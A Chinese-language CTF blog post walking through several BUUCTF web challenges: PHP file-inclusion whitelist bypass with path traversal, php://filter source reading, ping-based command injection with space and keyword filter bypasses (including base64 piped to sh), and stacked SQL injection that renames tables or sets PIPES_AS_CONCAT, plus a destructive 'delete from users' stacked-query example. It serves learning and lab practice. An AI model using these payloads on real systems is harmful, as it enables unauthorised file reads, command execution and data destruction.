<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php  </span><br><span class="line"> highlight_file(__FILE__);  </span><br><span class="line"> class emmm </span><br><span class="line"> &#123;    </span><br><span class="line"> public static function checkFile(&amp;$page)    </span><br><span class="line"> &#123;     </span><br><span class="line"> //白名单</span><br><span class="line"> $whitelist = [&quot;source&quot;=&gt;&quot;source.php&quot;,&quot;hint&quot;=&gt;&quot;hint.php&quot;]; </span><br><span class="line"> //isset（）判断变量是否声明不为null，is_string()判断变量是否是字符串用了逻辑或两个值都为真才能执行if里面的值</span><br><span class="line"> if (! isset($page) || !is_string($page)) &#123;     </span><br><span class="line"> echo &quot;you can&#x27;t see it&quot;;      </span><br><span class="line"> return false;     </span><br><span class="line"> &#125;  </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"> //mb_strpos()：返回要查找的字符串在别一个字符串中首次出现的位置</span><br><span class="line">// mb_strpos (haystack ,needle )</span><br><span class="line">// haystack：要被检查的字符串。</span><br><span class="line">// needle：要搜索的字符串</span><br><span class="line"></span><br><span class="line">//mb_substr() 函数返回字符串的一部分。</span><br><span class="line"></span><br><span class="line">//str 必需。从该 string 中提取子字符串。</span><br><span class="line">//start 必需。规定在字符串的何处开始。</span><br><span class="line">//ength 可选。规定要返回的字符串长度。默认是直到字符串的结尾。</span><br><span class="line"></span><br><span class="line"> //检测传入的值是否匹配白名单列表$whitelist如果有则执行真</span><br><span class="line">1. if (in_array($page, $whitelist)) &#123;      </span><br><span class="line"> return true;     </span><br><span class="line"> &#125;  </span><br><span class="line"> /*in_array(search,array,type) 函数搜索数组中是否存在指定的值，</span><br><span class="line">			白名单过滤，需要返回了ture</span><br><span class="line">			所以这里我们传入的page或者是经过截断之后的page必须是soure.php或hint.php，</span><br><span class="line">			这里是正常的访问，我们需要构造文件任意包含，所以这里传入的不满足条件，这里不是注意的点，往下继续看*/</span><br><span class="line"></span><br><span class="line"> //过滤问号的函数（如果$page的值有?则从？之前提取字符串）</span><br><span class="line"> $_page = mb_substr(     </span><br><span class="line"> $page,  </span><br><span class="line"> 0,      </span><br><span class="line"> mb_strpos($page . &#x27;?&#x27;, &#x27;?&#x27;)     </span><br><span class="line">  //返回$page.?里?出现的第一个位置</span><br><span class="line">  );    </span><br><span class="line"></span><br><span class="line"> //第二次检测传进来的值是否匹配白名单列表$whitelist 如果有则执行真</span><br><span class="line">2. if (in_array($_page, $whitelist)) &#123;       </span><br><span class="line"> return true;     </span><br><span class="line"> &#125;     </span><br><span class="line"> $_page = urldecode($page);    </span><br><span class="line"> $_page = mb_substr(     </span><br><span class="line"> $_page,      </span><br><span class="line"> 0,     </span><br><span class="line"> mb_strpos($_page . &#x27;?&#x27;, &#x27;?&#x27;)   </span><br><span class="line"> );    </span><br><span class="line"></span><br><span class="line">//第三次检测传进来的值是否匹配白名单列表$whitelist 如果有则执行真</span><br><span class="line">3.if (in_array($_page, $whitelist)) &#123;  </span><br><span class="line"> return true;   </span><br><span class="line"> &#125;    </span><br><span class="line"> echo &quot;you can&#x27;t see it&quot;;    </span><br><span class="line"> return false;  </span><br><span class="line"> &#125; </span><br><span class="line"> &#125; </span><br><span class="line"> if (! empty($_REQUEST[&#x27;file&#x27;])  </span><br><span class="line"> &amp;&amp; is_string($_REQUEST[&#x27;file&#x27;]) </span><br><span class="line"> &amp;&amp; emmm::checkFile($_REQUEST[&#x27;file&#x27;]) </span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line">!empty($_REQUEST[&#x27;file&#x27;])要我们的file变量不为空我们先进行分析这段代码 首先看80行第一个要求</span><br><span class="line">is_string($_REQUEST[&#x27;file&#x27;])要求我们传进来的值是字符串类型</span><br><span class="line">emmm::checkFile($_REQUEST[&#x27;file&#x27;])这里将我们的的值传到emmm类里面的checkFile函数</span><br><span class="line">这三个值通过&amp;&amp;逻辑与运算符连接也就是要求这块函数的返回值要全为真才能执行if里面的文件包含的代码 否则就执行else里面的图片代码</span><br><span class="line"></span><br><span class="line">&#123;    include $_REQUEST[&#x27;file&#x27;];   </span><br><span class="line"> exit; </span><br><span class="line"> &#125; else &#123;  </span><br><span class="line"> echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;</span><br><span class="line"> &#125;</span><br><span class="line"> ?&gt; </span><br></pre></td></tr></table></figure>

<p>这个checkfile函数进行了三次白名单检测，2次问号检测，一次url解码。—&gt;两个问号</p>
<p>首先我们先研究怎么构造语句：</p>
<p>传入checkfile函数要经历第一次白名单验证过滤了好了为hint.php，再进行一次过滤返回为真，则达成条件进行包含得到flag</p>
<p>include函数有这么一个神奇的功能：以字符‘/’分隔（而且不计个数），若是在前面的字符串所代表的文件无法被PHP找到，则PHP会自动包含‘/’后面的文件——注意是最后一个‘/’。</p>
<p>这里的ffffllllaaaagggg是在hint.php中发现的，显然flag在这个文件里。其实文件名提示了我们要使用四层目录，这里比较坑。<br>padload=</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=hint.php?../../../../../ffffllllaaaagggg </span><br></pre></td></tr></table></figure>

<h4 id="6-ACTF2020-新生赛-include"><a href="#6-ACTF2020-新生赛-include" class="headerlink" title="6.[ACTF2020 新生赛]include"></a>6.[ACTF2020 新生赛]include</h4><p>文件包含题用伪协议file=php://filter/read=convert.base64-encode/resource=flag.php</p>
<h4 id="7-GXYCTF2019-Ping-Ping-Ping"><a href="#7-GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="7.[GXYCTF2019]Ping Ping Ping"></a>7.[GXYCTF2019]Ping Ping Ping</h4><p>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46184013/article/details/107061110">https://blog.csdn.net/qq_46184013/article/details/107061110</a></p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>这一题学习了对于空格和flag的替换，sh命令编码执行命令，内敛绕过</p>
<p>这种题目之前有做过，就是管道符加linux系统命令，有过滤。</p>
<p>这一题虽然简单但是网上的wp里可以学到很多知识点和妙法。</p>
<h5 id="1-space过滤绕过："><a href="#1-space过滤绕过：" class="headerlink" title="1.space过滤绕过："></a>1.space过滤绕过：</h5><ol>
<li>${IFS}替换</li>
<li>$IFS$1替换</li>
<li>${IFS替换</li>
<li>%20替换</li>
<li>&lt;和&lt;&gt;重定向符替换</li>
<li>%09替换</li>
</ol>
<h5 id="2-常见的管道符复习"><a href="#2-常见的管道符复习" class="headerlink" title="2.常见的管道符复习"></a>2.常见的管道符复习</h5><p>Windows支持的管道符</p>
<p>1.管道符|<br>|直接执行后面的语句<br><img src="/D:/blog/source/images/2020070115530620.png" alt="在这里插入图片描述"><br>2.管道符||<br>||如果前面命令是错的那么就执行后面的语句，否则只执行前面的语<img src="/D:/blog/source/images/20200701155320322.png" alt="在这里插入图片描述"><br>3.管道符&amp;<br>&amp;前面和后面命令都要执行，无论前面真假<img src="/D:/blog/source/images/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MTg0MDEz,size_16,color_FFFFFF,t_70.png" alt="在这里插入图片描述"></p>
<p><strong><code>&amp;&amp;</code>（就是逻辑与），如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令</strong></p>
<h5 id="3-但是这里过滤了很多符号。"><a href="#3-但是这里过滤了很多符号。" class="headerlink" title="3.但是这里过滤了很多符号。"></a>3.但是这里过滤了很多符号。</h5><p>一个个试一下，或者用fuzz，但是这里还是想学一下怎么过滤。</p>
<p>这里可以设着去看看有没有可以报源码的，这样我们就就可以清楚地看到一整个过滤过程。</p>
<p>所以我们输入index.php</p>
<p>?ip= |&#39;|&quot;|\|(|)|[|]|{|}/“, $ip, $match)){    echo preg_match(“/&amp;|/|?|*|&lt;|[\x{00}-\x{20}]|&gt;|&#39;|&quot;|\|(|)|[|]|{|}/“, $ip, $match);  </p>
<p>  die(“fxck your symbol!”);  }</p>
<p> else if(preg_match(“/ /“, $ip)){  </p>
<p>  die(“fxck your space!”);  }</p>
<p> else if(preg_match(“/bash/“, $ip)){  </p>
<p>//Bash是一个命令处理器，通常运行于文本窗口中，并能执行用户直接输入的命令。Bash还能从文件中读取命令，这样的文件称为脚本。和其他Unix shell 一样，它支持文件名替换（通配符匹配）、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%AE%A1%E9%81%93">管道</a>、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/here%E6%96%87%E6%A1%A3">here文档</a>、命令替换、变量，以及条件判断和循环遍历的结构控制语句。包括关键字、语法在内的基本特性全部是从<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/sh">sh</a>借鉴过来的。其他特性，例如历史命令，是从<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/csh">csh</a>和<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/ksh">ksh</a>借鉴而来。总的来说，Bash虽然是一个满足<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/POSIX">POSIX</a>规范的shell，但有很多扩展。</p>
<p>  die(“fxck your bash!”);  } </p>
<p>else if(preg_match(“/.*f.*l.*a.<em>g.</em>/“, $ip)){  </p>
<p>  die(“fxck your flag!”);  } </p>
<p> $a = shell_exec(“ping -c 4 “.$ip);  echo “</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&quot;;</span><br><span class="line">  print_r($a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h5 id="4-过滤flag常用绕过方法"><a href="#4-过滤flag常用绕过方法" class="headerlink" title="4.过滤flag常用绕过方法"></a>4.过滤flag常用绕过方法</h5><h6 id="1-变量拼接"><a href="#1-变量拼接" class="headerlink" title="(1)变量拼接"></a>(1)变量拼接</h6><p>?ip=1;a=g;cat$IFS$1fla$a.php;</p>
<h6 id="2-base64编码"><a href="#2-base64编码" class="headerlink" title="(2)base64编码"></a>(2)base64编码</h6><p>用base64进行编码，再用命令进行解读。从而达到执行。<br>这里用的是sh，sh的大部分脚本都可以在bash下运行</p>
<p>前边Y2F0IGZsYWcucGhw是cat flag.php的base64编码.在用base64 -d命令进行执行<br>这里边的|是管道符。</p>
<p>padload=echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</p>
<h6 id="3-单引号，双引号绕过"><a href="#3-单引号，双引号绕过" class="headerlink" title="(3)单引号，双引号绕过"></a>(3)单引号，双引号绕过</h6><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ca<span class="string">&quot;t fl&#x27;&#x27;ag</span></span><br></pre></td></tr></table></figure>

<p>可以使用这种方法去绕过有时候的cat 和flag 但在本题单双引号被ban了</p>
<h6 id="4-1、-2等和-绕过"><a href="#4-1、-2等和-绕过" class="headerlink" title="(4)$1、$2等和 $@绕过"></a>(4)$1、$2等和 $@绕过</h6><p>eg:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c<span class="variable">$1at</span> gh<span class="variable">$@twf01</span>.txt</span><br></pre></td></tr></table></figure>

<h5 id="5-绕过cat常用绕过姿势"><a href="#5-绕过cat常用绕过姿势" class="headerlink" title="5.绕过cat常用绕过姿势"></a>5.绕过cat常用绕过姿势</h5><p>(1)more:一页一页的显示档案内容</p>
<p>(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页</p>
<p>(3)head:查看头几行</p>
<p>(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示</p>
<p>(5)tail:查看尾几行</p>
<p>(6)nl：显示的时候，顺便输出行号</p>
<p>(7)od:以二进制的方式读取档案内容</p>
<p>(8)vi:一种编辑器，这个也可以查看</p>
<p>(9)vim:一种编辑器，这个也可以查看</p>
<p>(10)sort:可以查看</p>
<p>(11)uniq:可以查看</p>
<p>(12)file -f:报错出具体内容</p>
<h5 id="内敛绕过"><a href="#内敛绕过" class="headerlink" title="内敛绕过"></a>内敛绕过</h5><p>这个真的很简洁。</p>
<p>内联，就是将反引号内命令的输出作为输入执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1;cat$IFS<span class="variable">$1</span>`ls`</span><br></pre></td></tr></table></figure>

<p>1<img src="/D:/blog/source/images/7-16449142598234.png" alt="7"></p>
<p>2<img src="/D:/blog/source/images/7.1-16449142632175.png" alt="7.1"></p>
<p>3<img src="/D:/blog/source/images/7.3-16449142697976.png" alt="7.3"></p>
<p><img src="/D:/blog/source/images/7.2-16449142741627.png" alt="7.2"></p>
<h5 id="8-强网杯-2019-随便注"><a href="#8-强网杯-2019-随便注" class="headerlink" title="8.[强网杯 2019]随便注"></a>8.<a target="_blank" rel="noopener" href="https://www.cnblogs.com/peri0d/p/12123814.html">[强网杯 2019]随便注</a></h5><p>1.手注</p>
<p>这里发现过滤了select</p>
<p>return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);</p>
<p>这题主要用堆叠注入加上修改字段名</p>
<p>0’;show tables;#</p>
<p>0’;show columns from words;#<br>0’;show columns from <code>1919810931114514</code>;#</p>
<p>1’;rename table words to word1;rename table <code>1919810931114514</code> to words;<br>alter table words add id int unsigned not null auto_increment primary key;<br>alter table words change flag data varchar(100);#</p>
<p>alter table words rename to word1;</p>
<p>flag 在全数字的表里，默认查询的是 words 表，</p>
<p>没过滤 alert 和 rename，那就可以把表和列改名。先把 words 改为 words1，再把数字表改为 words，然后把新的 words 表里的 flag 列改为 id ，这样就可以直接查询 flag 了。</p>
<ol>
<li>MySQL中反引号和单引号的区别与用法<ol>
<li>MySql 中用一对反引号来标注 SQL 语句中的标识，如<strong>数据库名、表名、字段名</strong>等</li>
<li>引号则用来标注语句中所引用的字符型常量或日期/时间型常量，即<strong>字段值</strong></li>
<li>例如：select * from <code>username</code> where <code>name</code>=”peri0d”</li>
<li>MySQL 的 show、rename 和 alter 命令<ol>
<li>show 可以用于查看当前数据库，当前表，以及表中的字段</li>
<li>rename 用于修改 table 的名称</li>
<li>alter 用于修改表中字段的属性</li>
</ol>
</li>
<li>攻击思路：默认查询 words 表，可以将数字表的名称改成 words，这样就可以 使用 or ‘1’=’1 直接查询 flag 了</li>
</ol>
</li>
</ol>
<p>sqlilabs里面也有堆叠</p>
<p>堆叠注入原理</p>
<p>在sql中，分号表示一条语句的结束。如果在分号的后面再加一条语句，这条语句也可以被执行，继续加一个分号和一条语句，这样就可以在一次数据库的调用中执行多个语句。</p>
<p>举个堆叠注入攻击的例子</p>
<p>执行查询时，第一个语句执行信息查询，第二个语句则将表user的所有内容给删除了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id =1;delete from users;</span><br></pre></td></tr></table></figure>

<p>堆叠注入的局限性</p>
<p>堆叠注入并不是在每种情况下都能使用的。大多数时候，因为API或数据库引擎的不支持，堆叠注入都无法实现。</p>
<h5 id="9-SUCTF-2019-EasySQL"><a href="#9-SUCTF-2019-EasySQL" class="headerlink" title="9.[SUCTF 2019]EasySQL"></a>9.[SUCTF 2019]EasySQL</h5><p>这题也算是堆叠注入</p>
<p>这题有出现正常显示，无显示，nonono三种情况，那么说明这种过滤是属于那种检测并ban的类型了。</p>
<p>所以我们可以用fuzz来看一下到底都过滤了什么：</p>
<p>然后发现好多都被滤了。。</p>
<p><img src="/images/9-164493782475012.png" alt="9"></p>
<p>那么我们就是一点都不能考虑联合注入了，select都被滤了，然后报错注入，时间盲注，ascii码的函数都被滤，也不行。</p>
<p>猜测用堆叠注入。</p>
<p>1；show databases;</p>
<p>1;show tables;都行，但是flag被滤了</p>
<p>然后就搞炸了，不懂。。。偷瞄一下wp</p>
<p>需要我们去对后端语句进行猜测，有点矛盾的地方在于其描述的功能和实际的功能似乎并不相符，通过输入非零数字得到的回显1和输入其余字符得不到回显来判断出内部的查询语句可能存在有||，也就是select 输入的数据||内置的一个列名 from 表名，进一步进行猜测即为select post进去的数据||flag from Flag(含有数据的表名，通过堆叠注入可知)，需要注意的是，此时的||起到的作用是or的作用</p>
<p>法1：输入的内容为*,1</p>
<p>字符串或时前面的数字时结果为1则返回1，为0则返回0，效果跟直接*一样</p>
<p>内置的sql语句为sql=”select”.sql=”select”.post[‘query’].”||flag from Flag”;</p>
<p>如果$post[‘query’]的数据为*,1，sql语句就变成了select *,1||flag from Flag，也就是select *,1 from Flag，也就是直接查询出了Flag表中的所有内容</p>
<p>select *,1 from flag<br>为啥我这样写payload就等同下面的语句？<br>你想想这个结构。。。</p>
<p>1 || flag<br>这。。。短路语法啊。。<br>返回的就是1嘛。。。。<br>所以我们成功实现拼接：</p>
<p>select *,1 from flag<br>select 1 from 的意思其实是建立一个临时列，这个列的所有初始值都被设为1。</p>
<p>关键就在前面的 * 了。</p>
<p>法2：</p>
<p>输入的内容为query=1;set sql_mode=PIPES_AS_CONCAT;select 1</p>
<p>其中set sql_mode=pipes_as_concat的作用是将||的作用由or变为拼接字符串</p>
<p>当设置sql_mode为PIPES_AS_CONCAT时，将”||”视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似</p>
<p>就是把 || 设置成了 concat函数呗。。。<br>这也是猜出了后端代码的。</p>
<p>但是要注意分号隔断了前面的命令，所以要再次添加select!!</p>
<p>上面那句执行是：</p>
<p>select concat(1,flag) from Flag</p>
<p><strong>知识点：</strong></p>
<p>后端代码猜测</p>
<p>1 || ** 类语句理解</p>
<p>select 1 from 类语句理解</p>
<p>set sql_mode = pipes_as_concat 命令理解（为什么没有过滤set、concat的原因）</p>
<p>补充一下系统变量：</p>
<p>附加几种常见的sql_mode值的介绍：</p>
<p>几种常见的mode介绍<br>ONLY_FULL_GROUP_BY：出现在select语句、HAVING条件和ORDER BY语句中的列，必须是GROUP BY的列或者依赖于GROUP BY列的函数列。</p>
<p>NO_AUTO_VALUE_ON_ZERO：该值影响自增长列的插入。默认设置下，插入0或NULL代表生成下一个自增长值。如果用户希望插入的值为0，而该列又是自增长的，那么这个选项就有用了。</p>
<p>STRICT_TRANS_TABLES：在该模式下，如果一个值不能插入到一个事务表中，则中断当前的操作，对非事务表不做限制</p>
<p>NO_ZERO_IN_DATE：这个模式影响了是否允许日期中的月份和日包含0。如果开启此模式，2016-01-00是不允许的，但是0000-02-01是允许的。它实际的行为受到 strict mode是否开启的影响1。</p>
<p>NO_ZERO_DATE：设置该值，mysql数据库不允许插入零日期。它实际的行为受到 strictmode是否开启的影响2。</p>
<p>ERROR_FOR_DIVISION_BY_ZERO：在INSERT或UPDATE过程中，如果数据被零除，则产生错误而非警告。如果未给出该模式，那么数据被零除时MySQL返回NULL</p>
<p>NO_AUTO_CREATE_USER：禁止GRANT创建密码为空的用户</p>
<p>NO_ENGINE_SUBSTITUTION：如果需要的存储引擎被禁用或未编译，那么抛出错误。不设置此值时，用默认的存储引擎替代，并抛出一个异常</p>
<p>PIPES_AS_CONCAT：将”||”视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似</p>
<p>ANSI_QUOTES：启用ANSI_QUOTES后，不能用双引号来引用字符串，因为它被解释为识别符</p>
<h5 id="10-Exec"><a href="#10-Exec" class="headerlink" title="10.Exec"></a>10.Exec</h5><p>管道符运用</p>
<h5 id="11-极客大挑战-2019-Secret-File"><a href="#11-极客大挑战-2019-Secret-File" class="headerlink" title="11.[极客大挑战 2019]Secret File"></a>11.[极客大挑战 2019]Secret File</h5><p><img src="/images/11-16449300970818.png" alt="11"></p>
<p>这一题很有意思，就是在源码里发现一个文件，打开后</p>
<p><img src="/images/11.1-16449301040649.png" alt="11.1"></p>
<p>点击secret会回显end.php,所以我们就抓包截下中间过程，然后发现注释里有一个新文件，所以我们打开后又发现：</p>
<p><img src="/images/11.2-164493011871710.png" alt="11.2"></p>
<p>然后这里过滤了一种伪协议input类型的，然后还有一种是filter的文件读取，然后这里过滤了前者，所以我们输入：<a target="_blank" rel="noopener" href="http://daedaf3a-9d02-44a0-bb52-ee2e82cc2757.node4.buuoj.cn:81/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php">http://daedaf3a-9d02-44a0-bb52-ee2e82cc2757.node4.buuoj.cn:81/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php</a></p>
<p><img src="/images/11.3-164493012951811.png" alt="11.3"></p>
<p>再解码即可。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hzk</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/02/13/buu-week1/">http://example.com/2022/02/13/buu-week1/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hzk</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                    <span class="chip bg-color">ctf题目--web</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/02/13/ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="ssti模板注入总结">
                        
                        <span class="card-title">ssti模板注入总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-02-13
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ssti/">
                        <span class="chip bg-color">ssti</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/02/10/i%E6%98%A5%E7%A7%8B-2/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="i春秋-2">
                        
                        <span class="card-title">i春秋-2</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-02-10
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                        <span class="chip bg-color">ctf题目--web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
